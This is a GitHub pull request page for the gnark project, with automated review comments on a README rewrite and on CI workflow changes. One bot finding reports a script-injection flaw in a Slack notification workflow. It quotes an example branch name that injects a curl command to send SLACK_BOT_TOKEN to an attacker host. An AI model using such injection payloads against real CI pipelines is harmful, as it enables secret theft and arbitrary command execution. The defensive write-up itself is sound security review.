Conversation
There was a problem hiding this comment.
Pull request overview
This PR refreshes README.md to present a more streamlined project introduction and onboarding flow for gnark users and contributors.
Changes:
- Reworks the README intro into a shorter “Why gnark” + “Useful Links” format.
- Adds a “Quick Start” section with requirements, install, and example run instructions.
- Reorganizes/updates sections on proving systems, GPU acceleration, security, testing commands, audits, and release notes.
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| ### Requirements | ||
|
|
||
| `gnark` tries to be backwards compatible when possible, however we do not guarantee that serialized object formats are static over different versions of `gnark`. Particularly - we do not have versioning implemented in the serialized formats, so using files between different versions of gnark may lead to undefined behaviour or even crash the program. | ||
| - Go `1.25+` (module target: `go 1.25.6`) |
There was a problem hiding this comment.
The stated requirement "Go 1.25+" is looser than the module’s go 1.25.6 directive. To avoid users trying unsupported patch versions, consider documenting the minimum as Go 1.25.6+ (or explicitly explain that the module targets 1.25.6 and CI uses 1.25.x).
| - Go `1.25+` (module target: `go 1.25.6`) | |
| - Go `1.25.6+` (module target: `go 1.25.6`) |
|
|
||
| If you have any questions, queries or comments, [GitHub discussions] is the place to find us. | ||
| ```bash | ||
| go run ./examples/cubic |
There was a problem hiding this comment.
The Quick Start example command uses a repo-relative path (go run ./examples/cubic), which will fail for readers who haven’t cloned the repository. Consider either adding a preceding clone/cd step or using a module-path invocation (e.g., go run github.com/consensys/gnark/examples/cubic@latest) so the Quick Start works from anywhere.
| go run ./examples/cubic | |
| go run github.com/consensys/gnark/examples/cubic@latest |
| ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit) | ||
|
|
||
| // groth16 zkSNARK: Setup | ||
| pk, vk, _ := groth16.Setup(ccs) | ||
|
|
||
| // witness definition | ||
| assignment := CubicCircuit{X: 3, Y: 35} | ||
| witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField()) | ||
| publicWitness, _ := witness.Public() | ||
|
|
||
| // groth16: Prove & Verify | ||
| proof, _ := groth16.Prove(ccs, pk, witness) | ||
| groth16.Verify(proof, vk, publicWitness) | ||
| _ = groth16.Verify(proof, vk, publicWitness) |
There was a problem hiding this comment.
The example circuit ignores errors from Compile, Setup, NewWitness, Prove, and Verify (and explicitly discards the Verify result). Since this snippet is likely to be copy/pasted, it would be better to demonstrate basic error handling (even if err != nil { panic(err) }) so failures don’t get silently ignored.
| Common local commands: | ||
|
|
||
| ```bash | ||
| go test -short ./... |
There was a problem hiding this comment.
go test -tags=release_checks,solccheck . requires additional local tooling (e.g., gnark-solidity-checker, solc, abigen) to be installed, otherwise it will fail. Consider adding a short note next to this command (or splitting it into a separate “requires extra deps” block) so contributors know what’s needed.
| go test -short ./... | |
| go test -short ./... | |
| # requires gnark-solidity-checker, solc, and abigen to be installed locally |
|
Review the following changes in direct dependencies. Learn more about Socket for GitHub.
|
| go test -json -v -p 4 -timeout=30m -tags=prover_checks ./test/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log | ||
| go test -json -v -p 4 -timeout=30m -tags=prover_checks ./examples/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log | ||
| go test -json -v -run=NONE -fuzz=FuzzIntcomp -fuzztime=30s ./internal/backend/ioutils 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log | ||
| go test -short -json -v -p 4 -short -timeout=30m ./... 2>&1 | gotestfmt -hide=all | tee /tmp/gotest.log |
There was a problem hiding this comment.
Duplicate -short flag in test command
Low Severity
The go test command on this line passes -short twice: once at the beginning and once after -p 4. The original command already had -short before -timeout=30m, and the bulk addition of -short to the start of each test line created this duplication. While Go silently accepts duplicate flags, this is clearly unintentional and suggests a missed cleanup.
| - name: Post to Slack | ||
| run: | | ||
| if [ "${{ inputs.status }}" == "success" ]; then | ||
| payload=$(jq -n --arg repository "${{ inputs.repository }}" --arg branch "${{ inputs.branch }}" --arg actor "${{ inputs.actor }}" --arg run_id "${{ inputs.run_id }}" '{ |
There was a problem hiding this comment.
Script injection via branch name in Slack workflow
Medium Severity
${{ inputs.branch }} is directly interpolated into a shell run: block. In the PR workflow, this value comes from ${{ github.head_ref }}, which is a user-controlled branch name. An attacker can craft a branch name containing shell metacharacters (e.g., "; curl attacker.com?t=$SLACK_BOT_TOKEN; #) to achieve arbitrary command execution and potentially exfiltrate SLACK_BOT_TOKEN. The safe pattern is to assign untrusted inputs to environment variables first, then reference them as "$BRANCH" in the script.


Description
Fixes # (issue)
Type of change
How has this been tested?
How has this been benchmarked?
Checklist:
golangci-lintdoes not output errors locallyNote
Medium Risk
Main risk is CI behavior change: more tests are gated behind
-shortand some fuzzing/time-consuming cases are reduced or skipped, which could let regressions slip through; Slack notifications add a new external integration dependent on secrets andcurl/jqavailability.Overview
CI workflows now use
go tool goimports(dropping explicitgoimportsinstalls) and add a new reusable workflow,slack-notifications.yml, to post success/failure messages to Slack afterprandpushtest jobs.Test/runtime changes: PR CI runs all test commands in
-shortmode, reduces fuzz time, and several heavy tests/integration paths now skip or downsample work whentesting.Short()is enabled.Deps/docs: bumps
gnark-cryptoand updatesgo.modto trackgoimports/asmfmtvia the Gotooldirective;README.mdis substantially reorganized with new quick start/testing sections and updated messaging.Written by Cursor Bugbot for commit b450755. This will update automatically on new commits. Configure here.